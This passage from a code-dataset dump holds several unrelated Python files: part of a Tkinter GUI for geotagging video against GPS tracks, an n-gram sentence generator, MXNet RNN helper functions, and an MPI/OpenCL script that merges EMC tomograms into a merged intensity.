sticky = 'W', pady = 15, ipadx = 90)\n load_button.grid(row = 6, column = 1, sticky = 'W', pady = 15)\n back_button.grid(row = 6, column = 2, sticky = 'W', pady = 15)\n \n #WINDOW FUNCTIONS\n def get_p_path(self):\n 
self.projectPath = tk.filedialog.askopenfilename(filetypes=[('Project Files', '*.pkl')])\n self.path_str.set(str(self.projectPath))\n \n def load_project(self):\n if self.path_str.get() == '':\n self.path_entry.configure({\"background\": \"red\"})\n return\n else:\n self.path_entry.configure({\"background\": \"white\"})\n self.controller.project.load(projectFile = self.path_str.get())\n \n for attr in ['projectName','config','videos','tracks']:\n if attr in vars(self.controller.project):\n setattr(self.controller, attr, getattr(self.controller.project, attr))\n self.controller.project.create(self.controller.project.projectName, \n self.controller.project.config, \n videos = self.controller.project.videos, \n tracks =self.controller.project.tracks)\n frame = MatchPage(self.parent, self.controller)\n self.controller.frames[MatchPage] = frame\n frame.grid(row = 0, column = 0, sticky =\"nsew\")\n for attr in ['time_col','lat_col','long_col','ele_col','offset']:\n if attr in vars(self.controller.project):\n setattr(self.controller, attr, getattr(self.controller.project, attr))\n frame.time_col.set(self.controller.time_col)\n frame.lat_col.set(self.controller.lat_col)\n frame.long_col.set(self.controller.long_col)\n frame.ele_col.set(self.controller.ele_col)\n frame.offset.set(self.controller.offset)\n \n self.controller.show_frame(MatchPage)\n \n# Autoscan on: select folder where input files are; Autoscan off select video and track files individually \nclass LoadDataPage(tk.Frame): \n \n def __init__(self, parent, controller): \n \n tk.Frame.__init__(self, parent) \n \n #WINDOW VARIABLES\n self.controller = controller\n self.parent = parent\n time = datetime.datetime.now()\n projectName = 'project'+ time.strftime('%Y-%m-%d_%H%M%S')\n self.projectName = projectName\n self.yoffset = 1\n \n #WINDOW ELEMENTS\n window_label = tk.Label(self,text ='Project Setup',font=('Arial',12,'bold'))\n \n self.autoscan_int = tk.IntVar()\n autoscan_check = tk.Checkbutton(self, text='', variable=self.autoscan_int, width = 5)\n autoscan_label = tk.Label(self, text = 'Autoscan')\n \n self.next_button = tk.Button(self, text = 'Continue', command = self.get_input)\n \n self.name_str = tk.StringVar(self)\n self.name_str.set(self.projectName)\n name_label = tk.Label(self, text = 'Project Name: ')\n self.name_entry = tk.Entry(self, textvariable = self.name_str)\n \n self.pconfig_str = tk.StringVar(self)\n self.pconfig_str.set('EXIF')\n p_config = tk.OptionMenu(self, self.pconfig_str, 'EXIF', 'trident')\n p_config_label = tk.Label(self, text = 'Project Config: ')\n \n back_button = tk.Button(self, text =\"Back\", \n command = lambda : controller.show_frame(StartPage))\n \n #DRAW COMMANDS\n window_label.grid(row = -1+self.yoffset, column = 1, sticky = 'W', pady = 10)\n name_label.grid(row = 0+self.yoffset, column = 1, sticky = 'W', pady = 10)\n self.name_entry.grid(row = 0+self.yoffset, column = 2, sticky = 'W', pady = 15, ipadx = 45)\n p_config_label.grid(row = 2+self.yoffset, column = 1, sticky = 'W', pady = 10)\n p_config.grid(row = 2+self.yoffset, column = 2, sticky = 'W', pady = 10)\n autoscan_check.grid(row = 3+self.yoffset, column = 2, sticky = 'W', pady = 10)\n autoscan_label.grid(row = 3+self.yoffset, column = 1, sticky = 'W', pady = 10)\n self.next_button.grid(row = 8+self.yoffset, column = 1, sticky = 'W', pady = 10)\n back_button.grid(row=8+self.yoffset, column = 2)\n \n #WINDOW FUNCTIONS\n def get_i_path(self):\n self.inputPath = str(tk.filedialog.askdirectory())+'/'\n self.ipath_str.set(self.inputPath)\n \n 
def get_p_path(self):\n        self.projectPath = str(tk.filedialog.askdirectory())+'/'\n        self.ppath_str.set(self.projectPath)\n        self.get_p_name()\n    \n    def get_p_name(self):\n        self.projectName = self.name_str.get()\n    \n    def get_video(self):\n        video = tk.filedialog.askopenfilename()\n        self.videos.append(video)\n        self.video_str.set(str([i.split('/')[-1] for i in self.videos]))\n    \n    def get_track(self):\n        track = tk.filedialog.askopenfilename()\n        self.tracks.append(track)\n        self.track_str.set(str([i.split('/')[-1] for i in self.tracks]))\n    \n    def get_input(self):\n        if self.name_str.get() == '':\n            self.name_entry.configure({\"background\": \"red\"})\n            return\n        else:\n            self.name_entry.configure({\"background\": \"white\"})\n        \n        self.next_button.destroy()\n        if self.projectName != None:\n            autoscan = self.autoscan_int.get() == 1\n            if autoscan is True:\n                ipath_button = tk.Button(self, text = 'Select',\n                           command = self.get_i_path)\n                self.ipath_str = tk.StringVar(self)\n                self.ipath_entry = tk.Entry(self, textvariable = self.ipath_str)\n                ipath_label = tk.Label(self, text = 'Input Folder: ')\n                \n                next_button1 = tk.Button(self, text = 'Scan For Files', command = self.autoscan)\n                \n                ipath_button.grid(row = 4+self.yoffset, column = 3, padx = 10, pady = 10, sticky = 'W')\n                self.ipath_entry.grid(row = 4+self.yoffset, column = 2, padx = 10, pady = 10, ipadx=90)\n                ipath_label.grid(row = 4+self.yoffset, column = 1, padx = 10, pady = 10, sticky = 'W')\n                next_button1.grid(row = 5+self.yoffset, column = 1, padx = 10, pady = 10)\n            \n            if autoscan is False:\n                self.videos = []\n                self.tracks = []\n                video_button = tk.Button(self, text = 'Add Video', command = self.get_video)\n                self.video_str = tk.StringVar(self)\n                self.video_entry = tk.Entry(self, textvariable = self.video_str)\n                \n                track_button = tk.Button(self, text = 'Add Track', command = self.get_track)\n                self.track_str = tk.StringVar(self)\n                self.track_entry = tk.Entry(self, textvariable = self.track_str)\n                \n                self.load_str = tk.StringVar()\n                load_status = tk.Label(self, textvariable = self.load_str)\n                load_button = tk.Button(self, text ='Load Files', \n                          command = self.load_files)\n                \n                video_button.grid(row = 5+self.yoffset, column = 1, padx = 10, pady = 10)\n                self.video_entry.grid(row = 5+self.yoffset, column = 2, padx = 10, pady = 10, ipadx=90)\n                track_button.grid(row = 6+self.yoffset, column = 1, padx = 10, pady = 10)\n                self.track_entry.grid(row = 6+self.yoffset, column = 2, padx = 10, pady = 10, ipadx=90)\n                load_status.grid(row = 8+self.yoffset, column = 2, pady = 10, sticky = 'W')\n                load_button.grid(row=8+self.yoffset, column=1, padx = 10, pady = 10)\n\n    def autoscan(self):\n        if self.ipath_str.get() == '':\n            self.ipath_entry.configure({\"background\": \"red\"})\n            return\n        else:\n            self.ipath_entry.configure({\"background\": \"white\"})\n        videos = []\n        tracks = []\n        for filename in os.listdir(str(self.inputPath)):\n            if 'MP4' in filename.split('.'):\n                if len(filename.split('.')) <= 2:\n                    videos.append(str(self.inputPath)+filename)\n            if 'gpx' in filename.split('.'):\n                if len(filename.split('.')) <= 2:\n                    tracks.append(str(self.inputPath)+filename)\n            if 'csv' in filename.split('.'):\n                if len(filename.split('.')) <= 2:\n                    tracks.append(str(self.inputPath)+filename)\n        self.videos = videos\n        self.tracks = tracks\n        \n        video_label = tk.Label(self, text= 'Videos: ')\n        self.video_str = tk.StringVar(self)\n        self.video_str.set(str([i.split('/')[-1] for i in self.videos]))\n        self.video_entry = tk.Entry(self, textvariable=self.video_str)\n        \n        \n        
track_label = tk.Label(self, text= 'Tracks: ')\n        self.track_str = tk.StringVar(self)\n        self.track_str.set(str([i.split('/')[-1] for i in self.tracks]))\n        self.track_entry = tk.Entry(self, textvariable=self.track_str)\n        \n        \n        self.load_str = tk.StringVar()\n        load_status = tk.Label(self, textvariable = self.load_str)\n        \n        load_button = tk.Button(self, text ='Load Files', \n                          command=self.load_files)\n\n        video_label.grid(row = 6+self.yoffset, column = 1, padx = 10, pady = 10)\n        self.video_entry.grid(row = 6+self.yoffset, column = 2, padx = 10, pady = 10, ipadx=90)\n        track_label.grid(row = 7+self.yoffset, column = 1, padx = 10, pady = 10)\n        self.track_entry.grid(row = 7+self.yoffset, column = 2, padx = 10, pady = 10, ipadx=90)\n        load_status.grid(row = 8+self.yoffset, column = 2, sticky = 'W')\n        load_button.grid(row=8+self.yoffset, column=1)\n    \n    def load_files(self):\n        if self.video_str.get() == '':\n            self.video_entry.configure({\"background\": \"red\"})\n            return\n        else:\n            self.video_entry.configure({\"background\": \"white\"})\n        if self.track_str.get() == '':\n            self.track_entry.configure({\"background\": \"red\"})\n            return\n        else:\n            self.track_entry.configure({\"background\": \"white\"})\n        \n        self.config = self.pconfig_str.get()\n        self.load_str.set('Loading files...')\n        self.controller.project.create(self.projectName, self.config, videos = self.videos, tracks = self.tracks)\n        frame = MatchPage(self.parent, self.controller) \n        self.controller.frames[MatchPage] = frame \n        frame.grid(row = 0, column = 0, sticky =\"nsew\")\n        self.controller.show_frame(MatchPage)\n\n# Main function called on inputs: desired columns, time offset, maxtimediff \nclass MatchPage(tk.Frame): \n    def __init__(self, parent, controller): \n        \n        tk.Frame.__init__(self, parent) \n        \n        #WINDOW VARIABLES\n        self.controller = controller\n        columns = list(self.controller.project.pointsDFs[0].columns)\n        self.controller.time_col = 'None'\n        self.controller.lat_col = 'None'\n        self.controller.long_col = 'None'\n        self.controller.ele_col = 'None'\n        self.controller.offset = ''\n        \n        #WINDOW ELEMENTS\n        self.time_col = tk.StringVar(self)\n        self.time_col.set(self.controller.time_col)\n        time_col_label = tk.Label(self, text = 'Desired Time Column:')\n        time_col_menu = tk.OptionMenu(self, self.time_col, *columns)\n        \n        self.lat_col = tk.StringVar(self)\n        self.lat_col.set(self.controller.lat_col)\n        lat_col_label = tk.Label(self, text = 'Desired Lat Column:')\n        lat_col_menu = tk.OptionMenu(self, self.lat_col, *columns)\n        \n        self.long_col = tk.StringVar(self)\n        self.long_col.set(self.controller.long_col)\n        long_col_label = tk.Label(self, text = 'Desired Long Column:')\n        long_col_menu = tk.OptionMenu(self, self.long_col, *columns)\n        \n        self.ele_col = tk.StringVar(self)\n        self.ele_col.set(self.controller.ele_col)\n        ele_col_label = tk.Label(self, text = 'Desired Ele Column:')\n        ele_col_menu = tk.OptionMenu(self, self.ele_col, *columns)\n        \n        self.offset = tk.StringVar(self)\n        self.offset.set(self.controller.offset)\n        offset_label = tk.Label(self, text = 'Manual Time Offset: ')\n        offset_label2 = tk.Label(self, text = '(leave blank for auto)')\n        offset_entry = tk.Entry(self, textvariable = self.offset)\n        \n        self.match_status_str = tk.StringVar(self)\n        match_status = tk.Label(self,textvariable = self.match_status_str)\n        match_button = tk.Button(self, text ='Match', command = self.do_match)\n        \n        back_button = tk.Button(self, text ='Back', \n                            command = lambda : controller.show_frame(StartPage))\n\n        #DRAW COMMANDS\n        time_col_label.grid(row = 1, column = 1, sticky 
= 'E', pady = 10)\n        time_col_menu.grid(row = 1, column = 2, sticky = 'W', pady = 10)\n        \n        lat_col_label.grid(row = 2, column = 1, sticky = 'E', pady = 10)\n        lat_col_menu.grid(row = 2, column = 2, sticky = 'W', pady = 10)\n        \n        long_col_label.grid(row = 3, column = 1, sticky = 'E', pady = 10)\n        long_col_menu.grid(row = 3, column = 2, sticky = 'W', pady = 10)\n        \n        ele_col_label.grid(row = 4, column = 1, sticky = 'E', pady = 10)\n        ele_col_menu.grid(row = 4, column = 2, sticky = 'W', pady = 10)\n        \n        offset_label.grid(row = 5, column = 1, sticky = 'W', pady = 10)\n        offset_label2.grid(row = 5, column = 3, sticky = 'W', pady = 10)\n        offset_entry.grid(row = 5, column = 2, sticky = 'W', pady = 15)\n        \n        match_status.grid(row = 8, column = 2, sticky = 'W')\n        match_button.grid(row = 8, column = 1, sticky = 'W')\n        \n        back_button.grid(row=9, column=5)\n    \n    #WINDOW FUNCTIONS\n    def do_match(self):\n        try:\n            self.continue_button.grid_forget()\n        except AttributeError: pass\n        info = True\n        self.points = 0\n        for i in [self.time_col, self.lat_col, self.long_col]:\n            if i.get() == 'None':\n                info = False\n                break\n        if info == True:\n            self.controller.project.match(self.time_col.get(), \n                                 self.lat_col.get(), \n                                 self.long_col.get(), \n                                 self.ele_col.get(),\n                                 self.offset.get(),\n                                 self.match_status_str) \n            \n            self.continue_button = tk.Button(self, text ='Continue', \n                            command = lambda : self.controller.show_frame(ExportPage))\n            \n            \n            self.continue_button.grid(row=9, column=4)\n    \nclass ExportPage(tk.Frame): \n    def __init__(self, parent, controller): \n        tk.Frame.__init__(self, parent) \n        \n        #WINDOW VARIABLES\n        self.controller = controller\n        \n        #WINDOW ELEMENTS\n        window_label = tk.Label(self,text ='Export Page',font=('Arial',12,'bold'))\n        \n        ppath_label = tk.Label(self, text = 'Project Save Path: ')\n        self.ppath_str = tk.StringVar()\n        self.ppath_entry = tk.Entry(self, textvariable = self.ppath_str)\n        ppath_button = tk.Button(self, text = 'Select',\n                           command = self.get_p_path)\n        save_button = tk.Button(self, text = 'Save Project', command = self.save_project)\n        self.s_status_str = tk.StringVar(self)\n        s_status_label = tk.Label(self, textvariable = self.s_status_str)\n        \n        epath_label = tk.Label(self, text = 'Image Export Path: ')\n        self.epath_str = tk.StringVar()\n        self.epath_entry = tk.Entry(self, textvariable = self.epath_str)\n        epath_button = tk.Button(self, text = 'Select',\n                           command = self.get_e_path)\n        export_button = tk.Button(self, text = 'Export Project', command = self.threading)\n        self.e_status_str = tk.StringVar(self)\n        e_status_label = tk.Label(self, textvariable = self.e_status_str)\n        \n        \n        back_button = tk.Button(self, text =\"Back\", \n                            command = lambda : controller.show_frame(StartPage))\n        \n        #DRAW COMMANDS\n        window_label.grid(row = 0, column = 0, pady = 10)\n        \n        ppath_label.grid(row = 1, column = 0, padx = 10, pady = 10, sticky = 'W')\n        self.ppath_entry.grid(row = 1, column = 1, padx = 10, pady = 10, sticky = 'W', ipadx = 90)\n        ppath_button.grid(row = 1, column = 2, padx = 10, pady = 10, sticky = 'W')\n        save_button.grid(row = 2, column = 1, padx = 10, pady = 10, sticky = 'W')\n        s_status_label.grid(row = 2, column = 2, padx = 10, pady = 10, sticky = 'W')\n        \n        epath_label.grid(row = 3, column = 0, padx = 10, pady = 10, sticky = 'W')\n        self.epath_entry.grid(row = 3, column = 1, padx = 10, pady = 10, sticky = 'W', ipadx = 90)\n        epath_button.grid(row = 3, column = 2, padx = 10, pady = 10, sticky = 'W')\n        export_button.grid(row = 4, column = 1, padx = 10, pady = 10, sticky = 'W')\n        e_status_label.grid(row = 4, column = 
2, padx = 10, pady = 10, sticky = 'W')\n    \n    #WINDOW FUNCTIONS\n    def get_p_path(self):\n        self.projectPath = str(tk.filedialog.askdirectory()) + '/'\n        self.ppath_str.set(self.projectPath)\n    \n    def get_e_path(self):\n        self.exportPath = str(tk.filedialog.askdirectory()) + '/'\n        self.epath_str.set(self.exportPath)\n    \n    def save_project(self):\n        if self.ppath_str.get() == '':\n            self.ppath_entry.configure({\"background\": \"red\"})\n            return\n        else:\n            self.ppath_entry.configure({\"background\": \"white\"})\n        self.controller.project.save(self.ppath_str.get(), self.s_status_str)\n    \n    def threading(self): \n        t1 = Thread(target=self.export_project) \n        t1.daemon = True \n        t1.start()\n    \n    def export_project(self):\n        if self.epath_str.get() == '':\n            self.epath_entry.configure({\"background\": \"red\"})\n            return\n        else:\n            self.epath_entry.configure({\"background\": \"white\"})\n        \n        self.controller.project.export(self.epath_str.get(), self.e_status_str, self.controller)\n\n","repo_name":"becklabs/geotag-gui","sub_path":"frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":21691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74929207505","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\nimport random\nfrom random import randint\n\n\ndef wordListSum(wordList):\n    num = 0\n    for word, value in wordList.items():\n        num += value\n    return num\n\n\ndef RandomWord(wordList):\n    rand_index = randint(1, wordListSum(wordList))\n    for word, value in wordList.items():\n        rand_index -= value\n        if rand_index <= 0:\n            return word\n\n\ndef read_gram_dict():\n    with open(r\"C:\\Users\\yuanhuanfa\\Desktop\\nlp\\2-gram.txt\", 'r', encoding=\"utf-8\") as f:\n        f = f.read().splitlines()\n    result_dict = {}\n    text = []\n    for line in f:\n        word = line.split(':')\n        text.append(word)\n        result_dict = dict(text)\n    return result_dict\n\n\ndef predict_text():\n    result_dict = read_gram_dict()\n    words = []\n    for i in result_dict.keys():\n        words.append(i)\n    word_dict = {}\n    for i in range(1, len(words)):  # build a two-level (nested) dictionary\n        if words[i - 1] not in word_dict:\n            word_dict[words[i - 1]] = {}\n        if words[i] not in word_dict[words[i - 1]]:\n            word_dict[words[i - 1]][words[i]] = 0\n        word_dict[words[i - 1]][words[i]] += 1\n    #print(word_dict)\n    length = 100\n    chain = ''\n    current_word = random.choice(words)\n    for i in range(0, length):\n        temp = current_word\n        current_word = RandomWord(word_dict[current_word])\n        cut_word1 = temp.split(' ')[1]\n        # chain = chain+temp.split(' ')[0]\n        cut_word2 = current_word.split(' ')[0]\n        if cut_word1 == cut_word2:\n            chain = chain + temp.split(' ')[0]\n            temp = current_word\n    print(\"Randomly generated sentence of \"+str(length)+\" words: \"+chain)\n\n\nif __name__ == '__main__':\n    # read_dic_two()\n    predict_text()\n","repo_name":"nekowu/HFUT_CourseWork","sub_path":"junior_first_term/NLP/shiyan2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36698393493","text":"import mxnet as mx\nfrom mxnet import nd, autograd\nimport numpy as np\n\nctx = mx.cpu(0)\n#ctx = mx.gpu(0)\n\ndef one_hots(numerical_list, vocab_size):\n    result = nd.zeros((len(numerical_list), vocab_size), ctx=ctx)\n    for i, idx in enumerate(numerical_list):\n        result[i, idx] = 1.0\n    return result\n\n\ndef textify(embedding,character_list):\n    result = \"\"\n    indices = nd.argmax(embedding, axis=1).asnumpy()\n    for idx in indices:\n        result 
+= character_list[int(idx)]\n    return result\n\n\ndef softmax(y_linear, temperature=1.0):\n    lin = (y_linear-nd.max(y_linear)) / temperature\n    exp = nd.exp(lin)\n    partition = nd.sum(exp, axis=0, exclude=True).reshape((-1,1))\n    return exp / partition\n\n\ndef simple_rnn(inputs, state, params, temperature=1.0):\n    [Wxh, Whh, bh, Why, by] = params\n    outputs = []\n    h = state\n    for X in inputs:\n        h_linear = nd.dot(X, Wxh) + nd.dot(h, Whh) + bh\n        h = nd.tanh(h_linear)\n        yhat_linear = nd.dot(h, Why) + by\n        yhat = softmax(yhat_linear, temperature=temperature)\n        outputs.append(yhat)\n    return (outputs, h)\n\n\ndef cross_entropy(yhat, y):\n    return - nd.mean(nd.sum(y * nd.log(yhat), axis=0, exclude=True))\n\n\ndef average_ce_loss(outputs, labels):\n    assert(len(outputs) == len(labels))\n    total_loss = 0.\n    for (output, label) in zip(outputs,labels):\n        total_loss = total_loss + cross_entropy(output, label)\n    return total_loss / len(outputs)\n\n\ndef SGD(params, lr):\n    for param in params:\n        param[:] = param - lr * param.grad\n\ndef make_dict(character_list):\n    character_dict = {}\n    for k, word in enumerate(character_list):\n        character_dict[word] = k\n    return character_dict\n\ndef sample(prefix, num_chars,character_list,num_hidden,params,temperature=1.0):\n\n    # Initialize the string that we'll return to the supplied prefix\n    string = prefix\n\n    # Prepare the prefix as a sequence of one-hots for ingestion by RNN\n    vocab_size = len(character_list)\n    character_dict = make_dict(character_list)\n    prefix_numerical = [character_dict[char] for char in prefix]\n    input = one_hots(prefix_numerical,vocab_size)\n\n    # Set the initial state of the hidden representation ($h_0$) to the zero vector\n    sample_state = nd.zeros(shape=(1, num_hidden), ctx=ctx)\n\n    # For num_chars iterations,\n    #     1) feed in the current input\n    #     2) sample next character from the output distribution\n    #     3) add sampled character to the decoded string\n    #     4) prepare the sampled character as a one_hot (to be the next input)\n    for i in range(num_chars):\n        outputs, sample_state = simple_rnn(input, sample_state, params,temperature=temperature)\n        choice = np.random.choice(vocab_size, p=outputs[-1][0].asnumpy())\n        string += character_list[choice]\n        input = one_hots([choice],vocab_size)\n    return string","repo_name":"AlexBella365/FrenchTextGenerator","sub_path":"src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18920040776","text":"import argparse\nfrom pathlib import Path\n\nif __name__ == '__main__':\n    description = \\\n    \"\"\"\n    Update merged intensity. \n    \"\"\"\n    parser = argparse.ArgumentParser(description=description, formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n    parser.add_argument('-m', '--mpx', type=int, \\\n                        help=\"linear number of voxels for merged intensities. Default is the value in the last merged intensity pickle file.\")\n    parser.add_argument('-q', '--qmax', type=int, \\\n                        help=\"maximum q-value for determining probabilities. Default is to set qmax equal to the merged intensity value. -1 sets qmax to the data limit. -2 sets qmax to the edge limit.\")\n    parser.add_argument('--qmin', type=int, \\\n                        help=\"minimum q-value for determining probabilities. 
Default is to set qmin equal to the merged intensity value.\")\n    parser.add_argument('--rc', type=int, default=1024, \\\n                        help=\"number of rotations to simultaneously hold in memory for inner loop.\")\n    parser.add_argument('--ic', type=int, default=1024, \\\n                        help=\"number of detector pixels to simultaneously hold in memory for inner loop.\")\n    parser.add_argument('-P', '--P_file', type=str, default='probability-matrix-merged_intensity.h5', \\\n                        help=\"probability matrix h5 file containing logR values to normalise. For multiple files use comma-separated list (no spaces)\")\n    parser.add_argument('-d', '--data', type=str, default='data.cxi', \\\n                        help=\"cxi file containing data frames, for geometry.\")\n    parser.add_argument('-T', '--data_T', type=str, default='data_T.h5', \\\n                        help=\"h5 file containing transposed data frames.\")\n    parser.add_argument('--merge_I', action='store_true', \\\n                        help=\"merge tomograms in merged intensity space, this adds P . K in I and P . sum K / sum W in overlap then divides.\")\n    parser.add_argument('-o', '--output', type=str, default='merged_intensity.pickle', \\\n                        help=\"name of output python pickle file. For multiple files an index will be appended.\")\n    args = parser.parse_args()\n    \n    args.dataname = Path(args.data).stem\n\nfrom mpi4py import MPI\n\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\nimport sys\nimport h5py\nimport numpy as np\nimport tqdm\nimport scipy.constants as sc\nimport time\nimport pickle\nimport math\nimport os\n\nimport logR\nfrom emc.tomograms import *\nimport emc.merge_tomos as merge_tomos\n\nimport pyclblast\n\n\nif __name__ == '__main__':\n    print('\\n\\n')\n    if rank == 0 :\n        if args.qmin == None or args.qmax == None or args.mpx == None:\n            # get previous merged intensity\n            d = pickle.load(open(args.output, 'rb'))\n        \n        # get q-mask etc.\n        # ---------------\n        if args.qmin == None :\n            args.qmin = d['qmin']\n        \n        if args.qmax == None :\n            args.qmax = d['qmax']\n        \n        if args.mpx == None :\n            args.mpx = d['I'].shape[0]\n        \n        qmask, q, C, qmin, qmax = logR.get_qmask(args.qmin, args.qmax, args.dataname)\n\n        # get rotations from file or recalculate\n        # --------------------------------------\n        with h5py.File(args.P_file) as f :\n            Ndata, Mrot = f['probability_matrix'].shape\n            rot_order = f['rotation-order'][()]\n            wsums = f['tomogram_sums'][()]\n            ksums = f['photon_sums'][()]\n            # 2GB limit for mpi \n            #P = np.ascontiguousarray(f['probability_matrix'][()].T.astype(np.float32))\n        \n        R, _ = logR.get_rotations(rot_order)\n    \n    else :\n        qmask = q = C = qmin = qmax = ksums = Ndata = Mrot = rot_order = wsums = R = P = None\n\n    qmask = comm.bcast(qmask, root=0)\n    q = comm.bcast(q, root=0)\n    C = comm.bcast(C, root=0)\n    qmin = comm.bcast(qmin, root=0)\n    qmax = comm.bcast(qmax, root=0)\n    Ndata = comm.bcast(Ndata, root=0)\n    Mrot = comm.bcast(Mrot, root=0)\n    ksums = comm.bcast(ksums, root=0)\n    wsums = comm.bcast(wsums, root=0)\n    R = comm.bcast(R, root=0)\n    #P = comm.bcast(P, root=0)\n    rot_order = comm.bcast(rot_order, root=0)\n    args.mpx = comm.bcast(args.mpx, root=0)\n    \n    #with h5py.File(args.P_file) as f :\n    #    P = np.ascontiguousarray(f['probability_matrix'][()].T.astype(np.float32))\n    \n    P_buf = np.empty((args.rc, Ndata), dtype=np.float32)\n    \n    Ndata = np.int32(Ndata)\n    Mrot = np.int32(Mrot)\n    Npix = np.int32(np.sum(qmask))\n    i0 = np.float32(args.mpx//2)\n    M = np.int32(args.mpx)\n\n    if (args.mpx % 2) == 0 :\n        dq = qmax / (args.mpx / 2 - 1)\n    else :\n        dq = 2 * qmax / (args.mpx - 1)\n    dq = np.float32(dq)\n    \n    U = math.ceil(Npix/args.ic)\n    \n    W = 
np.empty((args.rc, args.ic), dtype = np.float32)\n Wd = np.empty((args.rc, args.ic), dtype = np.float64)\n Ipix = np.empty((args.rc, args.ic), dtype = np.int32)\n K = np.empty((Ndata, args.ic), dtype=np.float32)\n PK = np.empty((args.rc,), dtype=np.float64)\n PK_on_W_r = np.empty((args.rc,), dtype=np.float64)\n\n P_cl = cl.array.empty(queue, (args.rc, Ndata), dtype=np.float32)\n K_cl = cl.array.empty(queue, (Ndata, args.ic), dtype=np.float32)\n W_cl = cl.array.empty(queue, (args.rc, args.ic), dtype = np.float32)\n C_cl = cl.array.empty(queue, (Npix,), dtype = np.float32)\n qx_cl = cl.array.empty(queue, (Npix,), dtype = np.float32)\n qy_cl = cl.array.empty(queue, (Npix,), dtype = np.float32)\n qz_cl = cl.array.empty(queue, (Npix,), dtype = np.float32)\n Ipix_cl = cl.array.empty(queue, (args.rc, args.ic), dtype = np.int32)\n R_cl = cl.array.empty(queue, (9*Mrot,), dtype = np.float32)\n \n cl.enqueue_copy(queue, C_cl.data, np.ascontiguousarray(C[qmask].astype(np.float32)))\n cl.enqueue_copy(queue, R_cl.data, np.ascontiguousarray(R.astype(np.float32)))\n \n cl.enqueue_copy(queue, qx_cl.data, np.ascontiguousarray(q[0][qmask].astype(np.float32)))\n cl.enqueue_copy(queue, qy_cl.data, np.ascontiguousarray(q[1][qmask].astype(np.float32)))\n cl.enqueue_copy(queue, qz_cl.data, np.ascontiguousarray(q[2][qmask].astype(np.float32)))\n \n MT = merge_tomos.Merge_tomos(W.shape, (M, M, M))\n \n load_time = 0\n dot_time = 0\n scale_time = 0\n merge_time = 0\n \n if rank == 0 :\n print('number of rotations :', Mrot)\n print('number of data frames :', Ndata)\n print('number of pixels in q-mask :', Npix)\n \n start_time = time.time()\n \n i_iter = list(range(0, Npix, args.ic))[rank::size]\n \n Rrot = math.ceil(Mrot/args.rc)\n if rank == 0 :\n r_iter = tqdm.tqdm(range(Rrot), desc='generating tomograms')\n else :\n r_iter = range(Rrot)\n\n Kinds = np.arange(qmask.size).reshape(qmask.shape)\n qinds = Kinds[qmask]\n \n for r in r_iter:\n rstart = r*args.rc\n rstop = min(rstart + args.rc, Mrot)\n dr = rstop - rstart\n \n with h5py.File(args.P_file) as f :\n f['probability_matrix_rd'].read_direct(P_buf, np.s_[rstart:rstop, :], np.s_[:dr])\n cl.enqueue_copy(queue, P_cl.data, P_buf)\n \n PK[:dr] = P_buf.dot(ksums)[:dr]\n PK_on_W_r[:dr] = PK[:dr] / wsums[rstart:rstop]\n \n # loop over detector pixels\n for i in i_iter :\n istart = i\n istop = min(i + args.ic, Npix)\n di = istop - istart \n \n # copy data-pixels to gpu\n t0 = time.time()\n with h5py.File(args.data_T) as f:\n if di != args.ic :\n K.fill(0)\n K[:, :di] = f['data_id'][qinds[istart:istop], :].T\n cl.enqueue_copy(queue, K_cl.data, K)\n load_time += time.time() - t0\n \n # calculate dot product (tomograms) W_ri = sum_d P_rd K_di \n t0 = time.time()\n pyclblast.gemm(queue, dr, di, Ndata, P_cl, K_cl, W_cl, a_ld = Ndata, b_ld = args.ic, c_ld = args.ic)\n queue.finish()\n dot_time += time.time() - t0\n \n # scale tomograms w_ri <-- w_ri / (sold + pol. 
correction C_i)\n t0 = time.time()\n cl_code.scale_tomograms_for_merge_w_coffset( queue, (di,), None,\n W_cl.data, C_cl.data,\n np.int32(args.ic), np.int32(0), np.int32(dr), np.int32(istart))\n queue.finish()\n scale_time += time.time() - t0\n \n \n # calculate tomogram to merged intensity pixel mappings\n t0 = time.time()\n cl_code.calculate_W_to_I_mapping_w_ioffset(queue, (di,), None,\n Ipix_cl.data, R_cl.data, qx_cl.data, qy_cl.data, qz_cl.data, dq, \n i0, np.int32(args.ic), M, np.int32(rstart), np.int32(rstop), np.int32(istart))\n \n # should reduce W and Ipix to rc buffers to cut down on transfer...\n cl.enqueue_copy(queue, W, W_cl.data)\n cl.enqueue_copy(queue, Ipix, Ipix_cl.data)\n \n # merge tomograms Isum[n] += sum_d P_rd K_di[n] / (sold + pol. correction C_i[n])\n # O[n] += sum_d P_rd sum_i K_di / sum_i Wold_ri\n # PK_r / wsums_r\n \n # merge: can I do this on the gpu?\n merge_tomos.queue.finish()\n Wd[:dr] = W[:dr]\n \n MT.merge(Wd, Ipix, 0, dr, PK_on_W_r, di, merge_I = args.merge_I, is_blocking=False)\n merge_time += time.time() - t0\n I, O = MT.get_I_O()\n \n O = comm.reduce(O, op=MPI.SUM, root=0)\n I = comm.reduce(I, op=MPI.SUM, root=0)\n\n if rank == 0 :\n overlap = O.copy()\n Isum = I.copy()\n O[O==0] = 1\n I /= O\n\n pickle.dump({'qmax': qmax, 'qmin': qmin, 'dq': dq, 'I': I, 'Isum': Isum, 'overlap': overlap, 't': 0, 'sample-state': 0, 'data-set': args.data}, open(args.output, 'wb'))\n \n # record merged intensity for each iteration\n pickle.dump(I, open('past-merged_intensities.pickle', 'ab'))\n \n total_time = time.time() - start_time \n print('\\n')\n print('total time: {:.2e}s'.format(total_time))\n print('\\n')\n print('total time seconds')\n print('load time: {:.1e}'.format( load_time))\n print('dot time: {:.1e}'.format( dot_time))\n print('scale time: {:.1e}'.format( scale_time))\n print('merge time: {:.1e}'.format( merge_time))\n print('\\n')\n print('total time %')\n print('load time: {:5.1%}'.format( load_time / total_time))\n print('dot time: {:5.1%}'.format( dot_time / total_time))\n print('scale time: {:5.1%}'.format( scale_time / 